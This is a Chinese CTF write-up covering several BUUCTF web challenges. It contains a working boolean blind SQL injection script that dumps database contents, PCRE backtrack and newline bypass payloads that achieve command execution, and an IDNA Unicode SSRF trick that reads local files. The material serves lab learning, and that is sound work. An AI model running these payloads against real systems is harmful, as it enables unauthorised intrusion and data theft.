buuctf.web 64-96

1、[WUSTCTF2020]颜值成绩查询

考点:sql注入-盲注

题解:

(1)输入1-4都是有回显的;但是到5的时候就没有了;说明就是布尔盲注;采用异或盲注
参考链接

python 复制代码
import time
import requests
Success_message = "Hi"
def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))


if __name__ == '__main__':
    url = input("请输入url:")
    database_name()
    table_name()

2、[FBCTF2019]RCEService

考点:RCE---preg_math函数绕过

题解:

(1)提示以json格式输入;输入

py 复制代码
{"cmd":"ls"}

回显出index.php;说明服务器使用php写的;输入其他命令发现进行了过滤,说明用到了正则表达式preg_match函数。绕过preg_match函数有两种方法

(2)方法1 :利用preg_match函数的最大回溯次数可以绕过preg_match函数。 PCRE回溯次数绕过

查询英文PHP手册,发现php.ini中的pcre.backtrack_limit控制PCRE的回溯限制默认为1000000,python脚本

python 复制代码
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://78850bfd-7aa8-4e32-bfab-181f587057c5.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)

(2)利用preg_match函数只匹配第一行,所以可以利用换行符%0A来构造payload。

py 复制代码
/?cmd={%0A"cmd": "ls /home"%0A}
/?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

3、[SUCTF 2019]Pythonginx

考点:unicode转IDNA域名分割漏洞

题解:

(1)题目源码

python 复制代码
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

(1)就是如何绕过IDN转换

绕过检测方法1:

在unicode中有一种字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此url时,dns服务器会自动将url重定向到另一个网站

py 复制代码
?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.c℆sr/fffffflag

方法2:找一些其他的unicode符号经过punycode 转为 c 的字符;

python 复制代码
from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass


def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False

if __name__=="__main__":
    get_unicode()

4、[0CTF 2016]piapiapia

考点:反序列化字符串逃逸

题解:参考链接

陆续更新中!!!!

相关推荐
小满zs31 分钟前
React-router v7 第一章(安装)
前端·react.js
程序员小续37 分钟前
前端低代码架构解析:拖拽 UI + 代码扩展是怎么实现的?
前端·javascript·面试
wangpq44 分钟前
微信小程序地图callout气泡图标在ios显示,在安卓机不显示
前端·vue.js
curdcv_po1 小时前
Vue3 组件通信方式全解析
前端
Auroral1561 小时前
基于RabbitMQ的异步通知系统设计与实现
前端·后端
栗筝i1 小时前
Spring 核心技术解析【纯干货版】- XV:Spring 网络模块 Spring-Web 模块精讲
前端·网络·spring
打野赵怀真1 小时前
H5如何禁止动画闪屏?
前端·javascript
zhangxingchao1 小时前
关于浮点数的思考
前端
Riesenzahn1 小时前
你喜欢Sass还是Less?为什么?
前端·javascript